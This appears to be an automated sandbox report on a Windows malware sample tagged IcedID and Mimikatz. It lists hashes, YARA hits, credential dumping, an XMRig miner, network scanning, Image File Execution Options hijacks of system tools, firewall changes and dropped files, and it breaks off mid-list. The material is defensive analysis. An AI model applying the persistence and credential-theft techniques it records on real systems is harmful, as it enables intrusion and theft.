Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/01/2025, 10:09
Behavioral task
behavioral1
Sample
2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe
-
Size
7.2MB
-
MD5
00added94b19c9166481111d1b154277
-
SHA1
813e1d3ab1b240b7f11538ea7e45e20abd09e5d6
-
SHA256
ce30883799ac28689368d197d70f22eccc3f8a1f7bfdc7905d2d25d00b489b01
-
SHA512
84a5dbdee16704a64b60fbc8f70ca1c10b7a2299ab07329fa081b78492ad02ea4d4a1d3578f0dfe539c34611794b7984f7cf56f7e2387f135f75bfa36c280b6f
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 992 created 2064 992 pnreyic.exe 37 -
Xmrig family
-
Contacts a large (30795) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4376-179-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-183-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-200-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-213-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-222-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-235-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-250-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-499-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-500-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-502-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-757-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig behavioral2/memory/4376-759-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/1944-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1944-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c9a-6.dat mimikatz behavioral2/memory/3948-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1764-136-0x00007FF7D6B00000-0x00007FF7D6BEE000-memory.dmp mimikatz behavioral2/memory/1764-137-0x00007FF7D6B00000-0x00007FF7D6BEE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts pnreyic.exe File opened for modification C:\Windows\system32\drivers\etc\hosts pnreyic.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4740 netsh.exe 844 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 3948 pnreyic.exe 992 pnreyic.exe 2160 wpcap.exe 748 ttsqkuccf.exe 1764 vfshost.exe 5100 cntrtrctt.exe 4472 xohudmc.exe 1456 cuwoqc.exe 4376 zergmt.exe 3332 cntrtrctt.exe 2968 cntrtrctt.exe 4236 cntrtrctt.exe 2252 cntrtrctt.exe 1340 cntrtrctt.exe 3748 cntrtrctt.exe 1684 cntrtrctt.exe 2780 cntrtrctt.exe 4620 cntrtrctt.exe 3776 cntrtrctt.exe 2072 cntrtrctt.exe 392 cntrtrctt.exe 1092 cntrtrctt.exe 1704 pnreyic.exe 3152 cntrtrctt.exe 2296 cntrtrctt.exe 116 cntrtrctt.exe 2748 cntrtrctt.exe 508 ncgcflyve.exe 2640 pnreyic.exe -
Loads dropped DLL 12 IoCs
pid Process 2160 wpcap.exe 2160 wpcap.exe 2160 wpcap.exe 2160 wpcap.exe 2160 wpcap.exe 2160 wpcap.exe 2160 wpcap.exe 2160 wpcap.exe 2160 wpcap.exe 748 ttsqkuccf.exe 748 ttsqkuccf.exe 748 ttsqkuccf.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 66 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content pnreyic.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\cuwoqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 pnreyic.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F pnreyic.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache pnreyic.exe File created C:\Windows\SysWOW64\cuwoqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F pnreyic.exe -
resource yara_rule behavioral2/files/0x0007000000023cf2-135.dat upx behavioral2/memory/1764-136-0x00007FF7D6B00000-0x00007FF7D6BEE000-memory.dmp upx behavioral2/memory/1764-137-0x00007FF7D6B00000-0x00007FF7D6BEE000-memory.dmp upx behavioral2/files/0x0007000000023cfd-140.dat upx behavioral2/memory/5100-141-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/5100-145-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/files/0x0007000000023cfa-162.dat upx behavioral2/memory/4376-163-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/3332-171-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/2968-176-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/4376-179-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/4236-181-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/4376-183-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/2252-186-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/1340-190-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/3748-194-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/1684-198-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/4376-200-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/2780-203-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/4620-207-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/3776-211-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/4376-213-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/2072-216-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/392-220-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/4376-222-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/1092-229-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/3152-232-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/2296-234-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/4376-235-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/116-237-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/2748-239-0x00007FF66F730000-0x00007FF66F78B000-memory.dmp upx behavioral2/memory/4376-250-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/4376-499-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/4376-500-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/4376-502-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/4376-757-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx behavioral2/memory/4376-759-0x00007FF6DC6C0000-0x00007FF6DC7E0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\nblmptktz\etgfqftjv\ncgcflyve.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.exe pnreyic.exe File opened for modification C:\Windows\hrmeszcf\svschost.xml pnreyic.exe File created C:\Windows\nblmptktz\Corporate\vfshost.exe pnreyic.exe File created C:\Windows\hrmeszcf\pnreyic.exe 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe File created C:\Windows\nblmptktz\UnattendGC\specials\xdvl-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\spoolsrv.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.xml pnreyic.exe File created C:\Windows\nblmptktz\upbdrjv\swrpwe.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\docmicfg.xml pnreyic.exe File created C:\Windows\hrmeszcf\spoolsrv.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\docmicfg.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\schoedcl.xml pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\wpcap.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\cnli-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\tucl-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\svschost.exe pnreyic.exe File opened for modification C:\Windows\nblmptktz\etgfqftjv\Result.txt ncgcflyve.exe File created C:\Windows\nblmptktz\UnattendGC\specials\svschost.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\AppCapture64.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\libxml2.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\trch-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\svschost.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\vimpcsvc.xml pnreyic.exe File created C:\Windows\nblmptktz\Corporate\mimidrv.sys pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\ssleay32.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\trfo-2.dll pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\scan.bat pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\wpcap.exe pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\Packet.dll pnreyic.exe File created C:\Windows\hrmeszcf\vimpcsvc.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\vimpcsvc.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\zlib1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.exe pnreyic.exe File created C:\Windows\ime\pnreyic.exe pnreyic.exe File opened for modification C:\Windows\nblmptktz\Corporate\log.txt cmd.exe File created C:\Windows\hrmeszcf\docmicfg.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\spoolsrv.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\ucl.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.xml pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe pnreyic.exe File opened for modification C:\Windows\nblmptktz\etgfqftjv\Packet.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\coli-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\crli-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\posh-0.dll pnreyic.exe File created C:\Windows\hrmeszcf\svschost.xml pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\ip.txt pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\exma-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\tibe-2.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\Shellcode.ini pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\schoedcl.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\AppCapture32.dll pnreyic.exe File created C:\Windows\nblmptktz\Corporate\mimilib.dll pnreyic.exe File opened for modification C:\Windows\hrmeszcf\pnreyic.exe 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe File created C:\Windows\nblmptktz\UnattendGC\specials\libeay32.dll pnreyic.exe File created C:\Windows\hrmeszcf\schoedcl.xml pnreyic.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2848 sc.exe 4156 sc.exe 4708 sc.exe 2604 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ttsqkuccf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened 